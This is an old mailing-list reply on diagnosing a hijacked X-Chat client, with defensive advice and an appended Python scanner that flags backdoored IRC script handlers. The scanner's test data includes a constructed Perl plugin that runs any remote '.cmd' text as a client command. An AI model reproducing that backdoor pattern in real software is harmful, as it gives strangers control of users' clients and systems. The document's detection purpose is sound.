On Sun, 2002-03-24 at 02:43, Carsten Bauer wrote:
> I was away from my desk for a few minutes, when I came back, I found this on
> channel #Help on oz.org.
>
> Nobody had access to my computer, and I cannot see anything in my message
> log that would show as a login or hack.
>
>
> [18:22:10] --- Z has changed the topic to: (Numloxx) Numloxx security
> services: 893718780
> [18:22:18] --- You are now known as owned
> [18:22:21] --- Z sets ban on *!*@*
> [18:22:21] --- Z removes channel operator status from owned
> [18:22:21] --- Z removes channel operator status from Mark
> [18:22:21] --- Z removes channel operator status from Nick
> [18:22:21] <-- Z has kicked SlntMonk from #help ((owned) I lick tiktok's
> muff.)
> [18:22:21] --- You have been kicked from #help by Z ((owned) I lick tiktok's
> muff.)

Oh dear. Looks like this 'tiktok' fellow was able to convince your client to send arbitrary messages to the server. Not good.

> I do not run any other scripts apart from:
>
>
> [18:42:02] Registered Scripts:
> [18:42:02] Sysinfo 0.2.4
> [18:42:02] Blackmore's reactor v.2.0
> [18:42:02] BitchX 0.1
> [18:42:02] tracer.pl 1.0
> [18:42:02] XMMS-Tool 1.1
> [18:42:02] DaNumber8-SayReverse 1.0
> [18:42:02] Inbound Handlers:
> [18:42:02] PRIVMSG
> [18:42:02] 315
> [18:42:02] 352
>
> What are the inbound handlers exactly? I can't explain where it came from.
> Could this be the exploit that made xchat do this?

315 and 352 are the /WHO reply stuff, as mentioned elsewhere in this thread. They're fine.

The PRIVMSG handler scares me, though. That's the usual way for a backdoor to provide its 'service'. It's also a way for other (perfectly legitimate) scripts to serve requests from other clients, though, so don't assume it's a backdoor. For instance, if that 'Sysinfo' script will send system information to anyone who asks, then they'd probably ask by sending a PRIVMSG (or CTCP, which is handled by the PRIVMSG handler as well).

As has been suggested elsewhere, I recommend that you take a good look over the scripts you're running, and ensure that none of them contain a way for other people on IRC to send arbitrary commands to the IRC server. If they do, that's most likely how this 'tiktok' individual was able to take control of your channel. Note that there could be more than one backdoor per script, and there could be more than one script with one or more backdoors. Check them all thoroughly. Alternatively, you could instead opt to perform surgery with a chainsaw and not run any scripts at all.

Note that if there are any backdoors in any of your scripts, they may very well allow access to the /exec command. If they do, then intruders can also run arbitrary shell commands. This is even worse, since they can then delete all your files, install more backdoors or trojans, run arbitrary programs on your computer, and so forth.

If you're not running X-Chat as root, you could log in as root and do damage control on all parts of the system that are accessible to your non-root account. Don't use 'su', as it is possible that they've trojaned this command; instead, log in from a virtual console, ssh from another machine, or reboot in single-user mode. Look through your system for anything that your non-root account has access to change; particularly, check your login scripts and crontab for suspicious changes. Search through your home directory for executables you don't remember putting there. In summary, figure out what this person did and reverse it.

If you _are_ running X-Chat as root, then you'll have to format all your disks and install everything from scratch, since the damage that can be done by a compromised root is effectively irreversible. (This is why you don't want to run X-Chat as root.)

Good hunting.

Regards,
Alex.
-- PGP Public Key: http://aoi.dyndns.org/~alex/pgp-public-key -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GCS d- s:++ a18 C++(++++)>$ UL+++(++++) P--- L+++>++++ E---- W+(+++) N- o-- K+ w--- !O M(+) V-- PS+++ PE-- Y+ PGP+(+++) t* 5-- X-- R tv b- DI D+++ G e h! !r y ------END GEEK CODE BLOCK------
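Added example, not part of the thread and not code from any of the scripts Carsten listed: a small scanner that applies Alex's advice mechanically. It lists which inbound events a Perl script hooks (the equivalent of X-Chat's "Inbound Handlers" output) and then flags any PRIVMSG or CTCP handler that forwards text under the remote user's control into a client command, which is exactly the "backdoor" shape Alex describes. The three sample scripts are constructed for this example and imitate the X-Chat 1.x Perl plugin calls (IRC::register, IRC::add_message_handler, IRC::command, IRC::print); that API shape, and the taint rule (anything assigned from the handler's argument or from a regex capture counts as remote text), are assumptions made here, not facts from the thread.

```python
import re

# Constructed sample scripts (not the poster's real scripts). They imitate the
# X-Chat 1.x Perl plugin API (IRC::register, IRC::add_message_handler,
# IRC::command, IRC::print); that API shape is an assumption for illustration.
BENIGN_SYSINFO = r'''
IRC::register("Sysinfo", "0.2.4", "", "");
IRC::add_message_handler("PRIVMSG", "sysinfo_handler");
sub sysinfo_handler {
    my $line = shift;
    if ($line =~ /:!sysinfo$/) {
        IRC::command("/say Linux 2.4.18 on i686");   # fixed reply; remote text never reaches a command
    }
    return 0;
}
'''

WHO_TRACER = r'''
IRC::register("tracer.pl", "1.0", "", "");
IRC::add_message_handler("352", "who_reply");
IRC::add_message_handler("315", "who_end");
sub who_reply { my $line = shift; IRC::print("$line\n"); return 1; }
sub who_end   { return 1; }
'''

BACKDOORED = r'''
IRC::register("reactor", "2.0", "", "");
IRC::add_message_handler("PRIVMSG", "react");
sub react {
    my $line = shift;
    if ($line =~ /^:([^!]+)!.*PRIVMSG \S+ :\.cmd (.*)$/) {
        my $cmd = $2;
        IRC::command($cmd);   # whatever the remote user typed becomes a client /command
    }
    return 0;
}
'''

ALL_HOOKS_RE = re.compile(r'add_message_handler\(\s*"(\w+)"')
INBOUND_RE = re.compile(r'add_message_handler\(\s*"(PRIVMSG|CTCP)"\s*,\s*"(\w+)"')
ASSIGN_RE = re.compile(r'my\s+(\$\w+)\s*=\s*(.+?);')
COMMAND_RE = re.compile(r'IRC::command\s*\((.*?)\)\s*;')
REMOTE_INPUT_RE = re.compile(r'\$[1-9]|\$_\[|@_')   # regex captures and the sub's own arguments


def handlers(source):
    """Names of the inbound events a script hooks, like X-Chat's 'Inbound Handlers' list."""
    return ALL_HOOKS_RE.findall(source)


def sub_body(source, name):
    """Body of Perl sub `name`, found by naive brace matching (enough for plugin-sized scripts)."""
    m = re.search(r'sub\s+' + re.escape(name) + r'\s*\{', source)
    if not m:
        return ''
    depth, i = 1, m.end()
    while i < len(source) and depth:
        depth += {'{': 1, '}': -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1]


def tainted_vars(body):
    """Variables assigned from the handler's argument (the raw IRC line) or from regex captures.

    Heuristic: every $1..$9 capture is treated as remote text, since the only
    thing these handlers normally match against is the incoming line."""
    tainted = set()
    for var, rhs in ASSIGN_RE.findall(body):
        if rhs.strip() == 'shift' or REMOTE_INPUT_RE.search(rhs) or any(v in rhs for v in tainted):
            tainted.add(var)
    return tainted


def uses_remote_text(arg, tainted):
    if REMOTE_INPUT_RE.search(arg):
        return True
    return any(re.search(re.escape(v) + r'\b', arg) for v in tainted)


def scan(script_name, source):
    """Report each IRC::command() call in a PRIVMSG/CTCP handler whose argument the remote user controls."""
    findings = []
    for event, handler in INBOUND_RE.findall(source):
        body = sub_body(source, handler)
        tainted = tainted_vars(body)
        for arg in COMMAND_RE.findall(body):
            if uses_remote_text(arg, tainted):
                findings.append(f"{script_name}: {handler}() on {event} passes remote-controlled text "
                                f"to IRC::command({arg}); any /command, including /exec, can be sent")
    return findings


if __name__ == '__main__':
    for name, src in [('Sysinfo', BENIGN_SYSINFO), ('tracer.pl', WHO_TRACER), ('reactor', BACKDOORED)]:
        print(name, 'handlers:', handlers(src))
        for finding in scan(name, src):
            print('  !!', finding)
```

Run against the constructed samples, the WHO tracer hooks only 352 and 315 and is reported clean, the sysinfo script hooks PRIVMSG but only ever sends a fixed string and is also clean, and the "reactor" script is flagged because the text after ".cmd " goes straight into IRC::command. The scanner is a triage aid for the manual review Alex recommends, not a substitute for it: a script can reach the same effect through string concatenation, eval, or a helper sub that this heuristic does not follow, so a clean result still calls for reading the code.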